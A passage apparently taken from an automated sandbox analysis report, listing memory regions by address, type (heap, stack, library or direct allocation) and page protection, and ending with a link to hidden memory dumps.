|
page read and write
|
||
|
460A000
|
heap
|
page read and write
|
||
|
3970000
|
heap
|
page read and write
|
||
|
402A000
|
stack
|
page read and write
|
||
|
20D0000
|
heap
|
page execute and read and write
|
||
|
3940000
|
heap
|
page read and write
|
||
|
1A7FF000
|
stack
|
page read and write
|
||
|
3C6A000
|
heap
|
page read and write
|
||
|
4B1000
|
heap
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
39D7000
|
heap
|
page read and write
|
||
|
39F0000
|
trusted library allocation
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
1B73E000
|
stack
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
47C000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
2BBD000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
214000
|
heap
|
page read and write
|
||
|
5420000
|
heap
|
page read and write
|
||
|
23C000
|
heap
|
page read and write
|
||
|
3CD4000
|
heap
|
page read and write
|
||
|
3CE6000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
3900000
|
heap
|
page read and write
|
||
|
49A8000
|
heap
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
3955000
|
heap
|
page read and write
|
||
|
44C6000
|
heap
|
page read and write
|
||
|
44C8000
|
heap
|
page read and write
|
||
|
295000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
3D2000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
5512000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
direct allocation
|
page execute and read and write
|
||
|
56E9000
|
heap
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
|
5A0F000
|
heap
|
page read and write
|
||
|
364000
|
heap
|
page read and write
|
||
|
12460000
|
trusted library allocation
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
B60000
|
direct allocation
|
page execute and read and write
|
||
|
5494000
|
heap
|
page read and write
|
||
|
3CC8000
|
heap
|
page read and write
|
||
|
1F90000
|
heap
|
page read and write
|
||
|
7FE898DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F81000
|
trusted library allocation
|
page read and write
|
||
|
1E96000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
2F4000
|
heap
|
page read and write
|
||
|
4603000
|
heap
|
page read and write
|
||
|
56DD000
|
heap
|
page read and write
|
||
|
386B000
|
stack
|
page read and write
|
||
|
4DB000
|
direct allocation
|
page read and write
|
||
|
45FE000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page execute and read and write
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
49FF000
|
heap
|
page read and write
|
||
|
1FC3000
|
direct allocation
|
page read and write
|
||
|
27E3000
|
trusted library allocation
|
page read and write
|
||
|
3860000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
5080000
|
trusted library allocation
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
4FD000
|
heap
|
page read and write
|
||
|
3C0B000
|
stack
|
page read and write
|
||
|
59D6000
|
heap
|
page read and write
|
||
|
45AB000
|
heap
|
page read and write
|
||
|
39ED000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
CD4000
|
direct allocation
|
page execute and read and write
|
||
|
3CB2000
|
heap
|
page read and write
|
||
|
1A6FF000
|
stack
|
page read and write
|
||
|
1C7DF000
|
stack
|
page read and write
|
||
|
3914000
|
heap
|
page read and write
|
||
|
39CF000
|
heap
|
page read and write
|
||
|
3520000
|
trusted library allocation
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
5B8000
|
heap
|
page read and write
|
||
|
1B90000
|
heap
|
page read and write
|
||
|
35E000
|
heap
|
page read and write
|
||
|
5734000
|
heap
|
page read and write
|
||
|
27DB000
|
trusted library allocation
|
page read and write
|
||
|
49F3000
|
heap
|
page read and write
|
||
|
3F9F000
|
stack
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
4958000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
2BB5000
|
trusted library allocation
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
5E2000
|
heap
|
page read and write
|
||
|
44B5000
|
heap
|
page read and write
|
||
|
3912000
|
heap
|
page read and write
|
||
|
3125000
|
trusted library allocation
|
page read and write
|
||
|
567F000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
4B2000
|
heap
|
page read and write
|
||
|
1AB68000
|
heap
|
page read and write
|
||
|
2EB1000
|
trusted library allocation
|
page read and write
|
||
|
314000
|
heap
|
page read and write
|
||
|
31C000
|
heap
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
3560000
|
trusted library allocation
|
page read and write
|
||
|
3AD8000
|
trusted library allocation
|
page read and write
|
||
|
369000
|
heap
|
page read and write
|
||
|
2C5000
|
heap
|
page read and write
|
||
|
3CA000
|
heap
|
page read and write
|
||
|
3975000
|
heap
|
page read and write
|
||
|
41E000
|
heap
|
page read and write
|
||
|
368000
|
heap
|
page read and write
|
||
|
258000
|
heap
|
page read and write
|
||
|
49FD000
|
heap
|
page read and write
|
||
|
1AF50000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
21D000
|
stack
|
page read and write
|
||
|
53EE000
|
heap
|
page read and write
|
||
|
2AF000
|
heap
|
page read and write
|
||
|
1EE000
|
heap
|
page read and write
|
||
|
2E8000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
53A1000
|
heap
|
page read and write
|
||
|
5D7000
|
heap
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
56AE000
|
heap
|
page read and write
|
||
|
C9000
|
heap
|
page read and write
|
||
|
1E86000
|
heap
|
page read and write
|
||
|
1ABAD000
|
heap
|
page read and write
|
||
|
39E2000
|
heap
|
page read and write
|
||
|
1D00000
|
trusted library allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
1FB7000
|
direct allocation
|
page read and write
|
||
|
567000
|
heap
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
54D3000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
398F000
|
heap
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
4C7000
|
direct allocation
|
page read and write
|
||
|
2BAF000
|
stack
|
page read and write
|
||
|
5892000
|
heap
|
page read and write
|
||
|
7FE89BCD000
|
trusted library allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
12391000
|
trusted library allocation
|
page read and write
|
||
|
3CD0000
|
heap
|
page read and write
|
||
|
39F5000
|
trusted library allocation
|
page read and write
|
There are 1753 hidden memdumps, click here to show them.